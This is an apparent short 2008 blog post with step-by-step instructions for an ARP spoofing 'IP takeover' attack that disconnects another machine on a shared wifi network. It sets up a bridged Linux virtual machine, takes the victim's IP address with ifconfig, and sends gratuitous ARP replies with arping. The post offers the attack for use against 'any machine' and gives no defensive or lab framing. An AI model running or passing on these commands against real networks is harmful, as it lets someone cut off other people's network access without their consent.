A Blog about technology, linux, peer2peer, cool new downloads and software development.

Tuesday, July 1, 2008

ip takeover attack with arping to arp spoof

Disable the network of any machine from windows via wifi

1. install VirtualBox
2. install linux distro of choise in the virtual box as long as it has arping (ubuntu)
3. switch virtualbox network adapter into Host Interface mode
4. in windows Network Connections select VirtualBox Host Interface 1 and Wireless Network Connection, right click and choose bridge
5. in the linux that is running in virtualbox change the ip address to the attacked machine ip address and ping it with arping :


sudo ifconfig eth0 192.168.0.10 netmask 255.255.255.0
sudo arping -U -c 3 -I eth0 192.168.0.10
sudo arping -A -c 3 -I eth0 192.168.0.10


The attacked machine network should be disconnected

(iputils/arping source : http://www.skbuff.net/iputils/)

No comments: